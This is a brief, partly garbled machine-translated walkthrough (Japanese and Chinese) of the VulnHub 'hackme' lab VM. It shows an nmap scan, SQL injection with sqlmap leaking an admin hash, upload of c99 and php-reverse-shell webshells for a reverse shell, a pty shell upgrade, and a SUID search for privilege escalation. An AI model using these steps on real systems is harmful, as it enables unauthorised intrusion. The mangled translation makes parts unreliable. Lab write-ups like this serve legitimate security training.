ダウンロードリンク:
https://www.vulnhub.com/entry/hackme-1,330/
ネットワーク走査プローブ:
╰─nmapの-p1-65535 -sV N 10.10.202.131
22 / tcpのオープンSSH
80 / tcpのオープンHTTPのApache HTTPD 2.4.34((Ubuntuの))
SSHブラストは、試すのに十分で、見つかった可能性があり、その制約の数
ウェブ開始:
右のソース・レジスタ・インタフェースを探します
登録:管理者#と、正常ログイン
箱注射を検索してみてください:
POST /welcome.php HTTP / 1.1
ホスト:10.10.202.131
のUser-Agent:Mozillaの/ 5.0(X11; Linuxのx86_64で、RV:52.0)のGecko / 20100101 Firefoxの/ 52.0
受け入れ:text / htmlで、アプリケーション/ XHTML + xmlの、アプリケーション/ XML; Q = 0.9、* / *; Q = 0.8
のAccept-言語:EN-USを、EN; Q = 0.5
のAccept-エンコード:gzipで、収縮させる
リファラーを:http://10.10.202.131/welcome.php
クッキー:PHPSESSID = 8270007cakt7suts49gpagv058
接続:クローズ
アップグレード-安全でない-要求:1
のContent-Type:アプリケーション/ x-www-form-urlencodedで
のContent-Length:8
検索= 1
手の検出:
说明存在SQL注入漏洞,用sqlmap 跑一波
superadmin / 2386acb2cf356944177746fc92523983
https://hashkiller.co.uk/Cracker
2386acb2cf356944177746fc92523983 MD5 Uncrackable
okay 登录成功,看到了上传点:
好像直接可以上传PHP文件,尝试浏览访问下
尝试访问不行,尝试c99.php OK
进行反弹shell
cd /usr/share/webshells
╰─ cp php-reverse-shell.php /root
上传访问php-reverse-shell.php反弹shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
进行提权操作,具体可参考:https://www.cnblogs.com/hack404/p/10502187.html
$ find / -perm -u=s -type f 2>/dev/null